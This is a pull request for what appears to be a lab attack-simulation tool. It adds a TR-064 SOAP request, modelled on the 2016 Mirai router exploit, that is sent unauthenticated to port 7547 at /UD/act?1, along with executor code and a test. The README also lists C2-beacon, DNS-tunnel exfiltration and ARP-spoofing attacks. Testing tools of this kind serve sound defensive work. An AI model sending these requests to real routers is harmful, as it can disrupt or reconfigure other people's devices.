### PR TITLE
feat: TR-064 SOAP config-injection impact attack

### DIFF
--- a/README.md
+++ b/README.md
@@ -171,7 +171,7 @@ Each attack is defined by a `kind` field and mapped to an executor:
 * `c2_beacon` sends a single jittered check-in request per invocation, mimicking botnet C2 callback traffic; configurable via `port`, `path`, and `jitter_seconds`
 * `c2_dns_beacon` sends a single jittered real DNS query per invocation as a C2 check-in beacon over UDP/53, distinct wire shape from `c2_beacon`; configurable via `port`, `domain`, and `jitter_seconds`
 * `exfil_sim` sends a bulk outbound POST burst simulating data-staging/exfil traffic; configurable via `payload_size_bytes` and `chunk_size_bytes`
-* `config_tamper` sends a real config/firmware-tampering-shaped HTTP request (`path`, `method`, `body`) and reports the response status; defaults to `enabled: false` at the model level - each entry needs per-device safety vetting before it's turned on, since a payload that succeeds could brick real hardware
+* `config_tamper` sends a real config/firmware-tampering-shaped HTTP request (`path`, `method`, `body`, optional `content_type`/`soap_action` for SOAP-based exploits) and reports the response status; defaults to `enabled: false` at the model level - each entry needs per-device safety vetting before it's turned on, since a payload that succeeds could brick real hardware
 * `arp_spoof` runs real `arpspoof` against a device for a bounded `duration_seconds`, poisoning its ARP relationship with `gateway_ip` on `interface` (classic on-path MITM)
 * `dns_tunnel_exfil` encodes a staged payload as base32 subdomain labels sent via periodic real DNS queries, simulating DNS-tunneling exfiltration; configurable via `payload_size_bytes`, `chunk_size_bytes`, and `base_domain`
 * `placeholder` is a disabled stub for attacks not yet implemented (cannot be `enabled: true`)

--- a/configs/attacks.yaml
+++ b/configs/attacks.yaml
@@ -206,6 +206,26 @@ attacks:
     body: "ssid=capex-test&wpa_psk=capex-test-tamper"
     timeout_seconds: 5
 
+  # Impact #2 (#94) - TR-064 SOAP config-injection. Real, publicly
+  # documented attack: in late 2016 Mirai variants exploited the TR-064
+  # SOAP endpoint (/UD/act?1, CVE-2016-10372-adjacent pattern) to issue
+  # unauthenticated device-restart/reconfigure commands over port 7547,
+  # in the incident that knocked ~900k Deutsche Telekom routers offline.
+  # Also left disabled by default - real exploit against real router/
+  # gateway firmware, needs per-device vetting before enabling.
+  - name: config_tamper_tr064_soap
+    label: Config_Tamper_TR064_SOAP
+    kind: config_tamper
+    enabled: false
+    repeats: 1
+    port: 7547
+    path: /UD/act?1
+    method: POST
+    content_type: 'text/xml; charset="utf-8"'
+    soap_action: "urn:dslforum-org:service:Time:1#SetNTPServers"
+    body: "<?xml version=\"1.0\"?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Body><u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\"><NewNTPServer1>pool.ntp.org</NewNTPServer1></u:SetNTPServers></s:Body></s:Envelope>"
+    timeout_seconds: 5
+
   # ARP Spoofing / MITM (#82)
   # interface/gateway_ip are placeholders - verify these match the actual
   # lab NIC and router address before enabling.

--- a/src/capex/attacks/impact.py
+++ b/src/capex/attacks/impact.py
@@ -24,10 +24,15 @@ class ConfigTamperExecutor:
     def execute(self, *, device: DeviceConfig) -> str | None:
         host = str(device.ip)
         body = self._attack.body.format(target_ip=host).encode()
+
+        headers = f'Content-Type: {self._attack.content_type}\r\n'
+        if self._attack.soap_action:
+            headers += f'SOAPAction: "{self._attack.soap_action}"\r\n'
+
         request = (
             f'{self._attack.method} {self._attack.path} HTTP/1.1\r\n'
             f'Host: {host}\r\n'
-            'Content-Type: application/x-www-form-urlencoded\r\n'
+            f'{headers}'
             f'Content-Length: {len(body)}\r\n'
             'Connection: close\r\n\r\n'
         ).encode() + body

--- a/src/capex/models.py
+++ b/src/capex/models.py
@@ -156,6 +156,8 @@ class ConfigTamperAttackConfig(BaseModel):
     port: PositiveInt = 80
     path: str = Field(min_length=1)
     method: str = 'POST'
+    content_type: str = 'application/x-www-form-urlencoded'
+    soap_action: str | None = None
     body: str = Field(min_length=1)
     timeout_seconds: PositiveInt = 5
 

--- a/tests/test_impact.py
+++ b/tests/test_impact.py
@@ -62,6 +62,41 @@ def test_config_tamper_executor_sends_request_and_returns_status(monkeypatch) ->
     )
 
 
+def test_config_tamper_executor_sends_custom_content_type_and_soap_action(monkeypatch) -> None:
+    fake_socket = _FakeTcpSocket(recv_data=b'HTTP/1.1 200 OK\r\n\r\n')
+    monkeypatch.setattr(impact.socket, 'create_connection', lambda address, timeout: fake_socket)
+
+    soap_body = (
+        '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
+        '<s:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
+        '<NewNTPServer1>pool.ntp.org</NewNTPServer1></u:SetNTPServers></s:Body></s:Envelope>'
+    )
+    device = DeviceConfig(name='dev1', ip='192.168.1.1')
+    attack = ConfigTamperAttackConfig(
+        name='config_tamper_soap',
+        label='Config_Tamper_SOAP',
+        port=7547,
+        path='/UD/act?1',
+        content_type='text/xml; charset="utf-8"',
+        soap_action='urn:dslforum-org:service:Time:1#SetNTPServers',
+        body=soap_body,
+    )
+    executor = impact.ConfigTamperExecutor(attack=attack)
+
+    executor.execute(device=device)
+
+    body_bytes = soap_body.encode()
+    assert fake_socket.sent == (
+        b'POST /UD/act?1 HTTP/1.1\r\n'
+        b'Host: 192.168.1.1\r\n'
+        b'Content-Type: text/xml; charset="utf-8"\r\n'
+        b'SOAPAction: "urn:dslforum-org:service:Time:1#SetNTPServers"\r\n'
+        + f'Content-Length: {len(body_bytes)}\r\n'.encode()
+        + b'Connection: close\r\n\r\n'
+        + body_bytes
+    )
+
+
 def test_config_tamper_executor_returns_unreachable_on_connection_failure(monkeypatch) -> None:
     def refuse(address, timeout):
         raise ConnectionRefusedError


### PR DESCRIPTION
Second Impact example per #66's >= 2-examples-per-category bar. Resolves #94.

## Summary
- Extends `ConfigTamperAttackConfig`/`ConfigTamperExecutor` (from #80) with optional `content_type` and `soap_action` fields, so SOAP-based exploits can send the correct headers instead of the hardcoded `application/x-www-form-urlencoded` default. Backward compatible — existing #80 entry unaffected (defaults unchanged).
- New `config_tamper_tr064_soap` entry sends a real TR-064 SOAP envelope (`SetNTPServers`) to `/UD/act?1` on port 7547 with the correct `text/xml` content type and `SOAPAction` header.
- This is the actual technique Mirai variants used in late 2016 to issue unauthenticated device-restart/reconfigure commands against real routers — the incident that knocked ~900k Deutsche Telekom routers offline (CVE-2016-10372-adjacent pattern). Named, documented, real-world incident, not an invented technique.
- **Disabled by default**, same safety reasoning as #80: real exploit against real router/gateway firmware, needs per-device vetting before ever being enabled.

MITRE: T1489 Service Stop, T1565 Data Manipulation.

## Test plan
- [x] `uv run pytest` — full suite green
- [x] `uv run pytest --cov=capex` — `impact.py` and `registry.py` both 100%
- [x] `uv run ruff format . && uv run ruff check .` — clean
- [x] `uv run capex --dry-run` — confirms `configs/attacks.yaml` loads/validates with the new entry

I'll merge this manually; will close #94 with a comment linking the merge afterward.